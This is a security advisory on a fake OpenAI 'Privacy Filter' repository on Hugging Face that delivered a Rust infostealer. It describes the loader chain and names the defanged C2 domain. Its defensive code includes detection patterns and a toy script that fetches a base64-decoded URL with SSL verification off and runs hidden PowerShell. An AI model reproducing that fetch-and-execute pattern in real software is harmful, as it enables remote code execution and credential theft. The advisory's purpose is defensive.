
Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

TL;DR HIGH
  • What happened: Typosquatted Hugging Face repo impersonating OpenAI delivered a Rust-based infostealer; roughly 244,000 downloads were recorded before takedown.
  • Who's at risk: AI/ML developers and researchers who install models from Hugging Face without verifying repository authenticity are most exposed.
  • Act now: Audit any recently installed Hugging Face packages, especially those referencing OpenAI projects · Implement code review of loader scripts before executing any downloaded ML repository files · Enforce allowlists for trusted Hugging Face organisations and verify model card authenticity before download

Overview

A threat actor created a fraudulent Hugging Face repository named Open-OSS/privacy-filter that typosquatted OpenAI’s legitimate ‘Privacy Filter’ project. Discovered by HiddenLayer researchers on May 7, 2026, the repository briefly reached the #1 spot on Hugging Face’s trending list and recorded approximately 244,000 downloads before the platform removed it following reports. The campaign demonstrates how adversaries are actively exploiting the trust and discoverability mechanics of AI model-sharing platforms to distribute malware at scale.

Technical Analysis

The attack employed a multi-stage delivery chain designed to evade detection:

  1. Lure Layer: The repository copied OpenAI’s legitimate model card nearly verbatim, presenting a convincing facade to researchers and developers browsing trending AI tools.

  2. Loader Script (loader.py): A Python file included superficial AI-related code for camouflage. Behind this facade, it:

    • Disabled SSL certificate verification
    • Decoded a base64-encoded URL pointing to an external resource
    • Fetched and executed a JSON payload containing an embedded PowerShell command

  3. PowerShell Stage: Executed silently in a hidden window, the command downloaded start.bat, which:

    • Performed privilege escalation
    • Downloaded the final payload (sefirah)
    • Added the payload to Microsoft Defender’s exclusion list
    • Executed the payload

  4. Final Payload — Rust Infostealer (sefirah): A capable Rust-based credential harvester targeting:

    • Browser data (cookies, passwords, session tokens, encryption keys) from Chromium and Gecko browsers
    • Discord tokens, local databases, and master keys
    • Cryptocurrency wallets and wallet browser extensions
    • SSH, FTP, and VPN credentials including FileZilla configurations
    • Sensitive local files and wallet seeds/keys
    • System information and multi-monitor screenshots
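
The chain above hinges on a loader script that hides fetch-and-execute logic behind AI-themed camouflage. The following is a minimal static-triage sketch, not HiddenLayer's detection logic: the indicator patterns are illustrative examples of the behaviours described (disabled SSL verification, base64-decoded URLs, hidden PowerShell invocation, dynamic execution), and real loaders can trivially evade matching this naive.

```python
import re

# Hypothetical indicator patterns mirroring the loader.py behaviours described
# above; illustrative only, and easy for a determined adversary to evade.
SUSPICIOUS_PATTERNS = {
    "ssl_verification_disabled": r"verify\s*=\s*False|_create_unverified_context",
    "base64_decoded_url": r"\bb64decode\b",
    "powershell_invocation": r"powershell.*hidden",
    "dynamic_execution": r"\bexec\(|\beval\(|subprocess\.(?:run|Popen|call)",
}

def triage_script(source: str) -> list[str]:
    """Return the names of any indicator patterns found in a script's source."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items()
            if re.search(pattern, source, re.IGNORECASE)]

# A toy script exhibiting the same behaviours as the loader described above.
sample = (
    "import base64, requests, subprocess\n"
    "url = base64.b64decode('aHR0cHM6Ly9leGFtcGxlLmNvbQ==').decode()\n"
    "payload = requests.get(url, verify=False).json()\n"
    "subprocess.run(['powershell', '-WindowStyle', 'Hidden', payload['cmd']])\n"
)
print(triage_script(sample))
```

A sweep like this is a pre-execution screening aid for the code-review step recommended below, not a substitute for sandboxed dynamic analysis.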

Stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware also incorporates extensive anti-analysis capabilities, including VM, sandbox, and debugger detection.
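
Because exfiltration goes to a single hard-coded domain, even a coarse retroactive log sweep can surface infections. A minimal sketch, assuming newline-delimited proxy or DNS logs (the log format below is hypothetical; adapt the matching to your own source):

```python
# The domain is defanged in reporting as recargapopular[.]com; detection
# logic must match the real, un-defanged form.
C2_DOMAIN = "recargapopular.com"

def find_c2_hits(log_lines):
    """Yield (line_number, line) pairs that reference the C2 domain."""
    for lineno, line in enumerate(log_lines, start=1):
        if C2_DOMAIN in line.lower():
            yield lineno, line.rstrip()

# Hypothetical proxy log entries for illustration.
logs = [
    "2026-05-07T10:02:11Z host1 GET https://huggingface.co/models 200",
    "2026-05-07T10:05:43Z host1 POST https://recargapopular.com/upload 200",
]
for lineno, line in find_c2_hits(logs):
    print(f"line {lineno}: {line}")
```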

Framework Mapping

  • AML.T0010 — ML Supply Chain Compromise: The attack directly targets the AI/ML development pipeline by weaponising a trusted model-sharing platform to distribute malicious packages.
  • AML.T0019 — Publish Poisoned Datasets/Repositories: The adversary published a poisoned repository with a near-identical model card to deceive users.
  • AML.T0047 — ML-Enabled Product or Service: The attack exploits user trust in legitimate AI tooling ecosystems.
  • LLM05 — Supply Chain Vulnerabilities: The incident is a textbook example of third-party AI component compromise through a trusted distribution channel.

Impact Assessment

With 244,000 downloads recorded before removal, the potential victim pool is significant. Any Windows user who installed and executed code from this repository may have had browser credentials, cryptocurrency assets, SSH/VPN configurations, and session tokens exfiltrated. The attack is particularly dangerous for AI researchers, MLOps engineers, and developers who routinely install packages from Hugging Face as part of their workflow and may not scrutinise loader scripts closely.

Mitigation & Recommendations

  • Immediate: Check systems for the presence of sefirah or related artefacts; rotate all credentials stored in affected browsers and SSH/VPN configurations.
  • Network: Block connections to recargapopular[.]com and monitor for outbound traffic to unknown C2 infrastructure.
  • Process: Establish code review requirements for any Python scripts (loader.py patterns) downloaded from ML repositories before execution.
  • Platform Hygiene: Only install models from verified organisations on Hugging Face; cross-reference repositories against official vendor GitHub/documentation links.
  • Detection: Deploy behavioural monitoring for PowerShell execution spawned from Python processes, particularly those running in hidden windows.
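
The allowlist recommendation above can be sketched as a simple gate in whatever download tooling your team controls; the organisation names in TRUSTED_ORGS are illustrative examples, and in practice the check would run before any call to the Hugging Face download API.

```python
# Illustrative allowlist; populate from your organisation's vetted sources.
TRUSTED_ORGS = {"openai", "meta-llama", "google", "mistralai"}

def is_trusted_repo(repo_id: str) -> bool:
    """Allow a repo only when it belongs to an allowlisted organisation.

    Hugging Face repo IDs take the form "org/name"; anything without an
    org prefix, or from an unlisted org, is rejected.
    """
    org, _, name = repo_id.partition("/")
    return bool(name) and org.lower() in TRUSTED_ORGS

for repo in ("openai/whisper-large-v3", "Open-OSS/privacy-filter"):
    print(f"{repo}: {'allowed' if is_trusted_repo(repo) else 'BLOCKED'}")
```

Note that the typosquatted repo from this campaign fails the check, since "Open-OSS" is not a vetted organisation, while a genuine OpenAI repo passes.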
